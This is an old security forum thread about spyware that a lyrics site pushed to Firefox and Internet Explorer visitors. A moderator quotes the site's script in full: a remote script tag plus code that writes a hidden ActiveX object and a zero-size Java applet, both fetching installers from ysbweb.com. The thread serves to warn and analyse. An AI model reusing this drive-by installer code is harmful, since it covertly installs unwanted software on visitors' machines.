Firefox Spyware Infects IE?

I thought this would be of interest to our members as I read this report from another security forum.
========================================================

paperghost's article can be found here, at Vital Security.org - Firefox Spyware infects IE?


Edit Note - Please do not copy & paste an entire article - a summary or paragraph from the article is enough. Also, a link to the original source should be included. - snap

 

Take a look here.... with links to the Coyote thread
https://www.wilderssecurity.com/showthread.php?t=70025

 

From spywareinfoforum.com:

Spywareinfo Newsletter Mar13/05

 

Yeah, our very own bunch of "Experts" on this forum were muttering about scripts and whatnot in the thread "a new theory", when I tried to point out that it was just JAVA. But of course, I was ignored cos I'm a newbie.

 

Having re-read the original Wilders thread that I'm assuming you are referring to concerning this exploit....the script comments were mentioned if for no other reason than to caution IE users not to visit that site with Active script enabled because the java applet would be loaded along with a toolbar.

Opinions may vary....but I would hardly call any posts directed toward your posts as being dismissed. I also am of the opinion one can not BS a BS concerning...."I was ignored cos I'm a newbie"

Do not visit the below links without being properly secured

Visiting lyricspy.com with Active script enabled excutes the below code:

<script language='JavaScript' type='text/JavaScript'
src='http://www.ysbweb.com/ist/scripts/ysb_prompt.php?
retry=2&loadfirst=1&delayload=0&software_id=10&account_id=1001958&
recurrence=always&adid=a1110115353&event_type=onload&user_level=3'>
</script>

Which then excutes the below code:

function showActiveX() {
holder.write('<OBJECT id="barobject" width=1 height=1
classid="CLSID:42F2C9BA-614F-47c0-B3E3-ECFD34EED658"');
holder.write
('codebase="http://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab"
onerror="parent.retryit();">');

holder.write('<PARAM name="account_id" value="1001958">');
holder.write('<PARAM name="download_key"
value="df42914d752e3362ade7e24cced39c71">');
holder.write('<PARAM name="download_lock" value="1110807725">');
holder.write('<PARAM name="cfg" value="ysb_l3">');
holder.write('<PARAM name="sub" value="">');
holder.write('</OBJECT>');
}

function showJava() {

holder.write('<APPLET Archive="http://www.ysbweb.com/ist/softwares/v4.0/javainstaller.jar" code="javainstaller.InstallerApplet.class" name="InstallerApplet" width="0" height="0" hspace="0" vspace="0" align="middle">');
holder.write('<PARAM name="account_id" value="1001958">');
holder.write('<PARAM name="download_key" value="df42914d752e3362ade7e24cced39c71">');
holder.write('<PARAM name="download_lock" value="1110807725">');
holder.write('<PARAM name="cfg" value="ysb_l3">');
holder.write('<PARAM name="sub" value="">');
holder.write('</APPLET>');

 

Since we already have an ongoing thread concerning this issue from last week....I'll ask those that wish to continue the discussion Please visit the below link. This thread is now closed.

This link---> New Theory about Infections and Spyware